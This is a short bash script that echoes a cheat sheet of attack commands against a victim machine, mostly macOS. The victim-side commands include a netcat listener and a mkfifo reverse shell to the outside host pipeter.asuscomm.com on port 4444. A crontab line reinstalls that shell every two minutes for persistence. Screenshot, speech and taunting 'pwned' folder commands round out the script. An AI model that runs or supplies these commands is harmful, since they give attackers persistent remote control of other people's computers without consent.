#/bin/bash

echo "[*] AT:"
echo "nc -lvp 4444"
echo ""
echo "[*] VM:"
echo "rm -f /tmp/g; mkfifo /tmp/g; /bin/sh 0< /tmp/g | nc pipeter.asuscomm.com 4444 1> /tmp/g"
echo ""
echo "[*] Greetings:"
echo "say you have been pwned"
echo ""
echo "[*] crontab:"
echo 'crontab -l | { cat; echo "*/2 * * * * nohup -- \"\$(rm -f /tmp/g; mkfifo /tmp/g; /bin/sh 0< /tmp/g | nc pipeter.asuscomm.com 4444 1> /tmp/g)\" &"; } | crontab -'
echo ""
echo "[*] Screenshot"
echo "screencapture asd.jpg"
echo ""
echo "[*] crontab"
echo '*/2 * * * * nohup -- "$(rm -f /tmp/g; mkfifo /tmp/g; /bin/sh 0< /tmp/g | nc pipeter.asuscomm.com 4444 1> /tmp/g)" &'
echo ""
echo "[*] Send File:"
echo ""
echo ""
echo "[*] Folder:"
echo "mkdir ~/Desktop/you_have_been_pwned_by_amedeo"
echo ""
